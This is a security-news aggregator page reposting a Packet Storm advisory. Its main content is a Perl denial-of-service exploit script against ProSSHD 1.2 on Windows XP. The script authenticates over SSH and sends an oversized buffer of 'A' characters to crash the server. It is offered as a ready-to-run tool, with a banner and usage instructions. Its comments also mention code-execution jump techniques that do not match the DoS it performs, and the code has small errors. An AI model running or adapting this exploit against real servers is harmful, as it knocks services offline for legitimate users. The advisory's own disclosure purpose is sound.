Security
Headlines
HeadlinesLatestCVEs

Headline

ProSSHD 1.2 20090726 Denial Of Service

ProSSHD version 1.2 20090726 remote denial of service exploit.

Packet Storm
#vulnerability#web#windows#dos#git#perl#auth#ssh
#!/usr/bin/perluse Net::SSH2# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 13 january 2024# Vendor Homepage: https://prosshd.com/# Notification vendor: No reported# Tested Version: ProSSHD 1.2 20090726# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data to SSH.#The following request sends a large amount of data to the SSH to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {s      $cmd="clear";    }    system("$cmd");        intro();    main();print "\t    ==> Connecting to webserver... \n\n";sleep(1);my $i=0;    print "\t    ==> Exploiting... \n\n";my $payload  = "\x41" x 500;$connection2 = Net::SSH2->new();$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";$scpget = $connection2->scp_get($payload);$connection2->disconnect();print "\t    ==> Done! Exploited!";   sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] ProSSHD 1.2 20090726 - Denial of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: [email protected]      }  }  sub main {our ($ip, $port, $username, $password) = @ARGV;      unless (defined($ip) && defined($port)) {        print "\n\tUsage: $0 <ip> <port> <username> <password>           \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3